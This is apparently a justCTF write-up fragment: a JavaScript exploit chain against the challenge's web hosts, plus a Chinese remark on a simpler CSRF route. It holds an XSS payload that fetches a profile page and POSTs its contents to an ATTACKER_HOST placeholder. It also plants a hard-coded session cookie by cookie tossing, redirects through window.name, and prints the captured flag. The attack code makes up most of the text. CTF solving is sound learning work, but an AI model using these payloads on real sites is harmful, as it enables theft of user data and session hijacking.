'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'

// prepare an account with the following xss payload as description
// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
// playing with window/iframe references should work too
window.name =
'javascript:' +
encodeURIComponent(`
document.cookie = '=session=MTY4NTg2ODU0OXxEdi1CQkFFQ180SUFBUkFCRUFBQVRQLUNBQUlHYzNSeWFXNW5EQThBRFdGMWRHaGxiblJwWTJGMFpXUUVZbTl2YkFJQ0FBRUdjM1J5YVc1bkRBb0FDSFZ6WlhKdVlXMWxCbk4wY21sdVp3d0xBQWx6ZFhCbGNtNWxibVU9fNgFpBvKntkK07FH7_Zcu0zSesy10P01b20weA_MIt_p;domain=web.jctf.pro;path=/profile'
location = 'https://phantom.web.jctf.pro/profile'
`)
location = samesiteXSS
// justCTF{why_on_earth_does_my_app_handle_HEADs}
</script>

另外是我賽後才知道其實 r.FormValue(key) 其實也會從 query string 讀取,所以 CSRF 其實直接 HEAD /profile/edit?name=&description=XSS 就行了。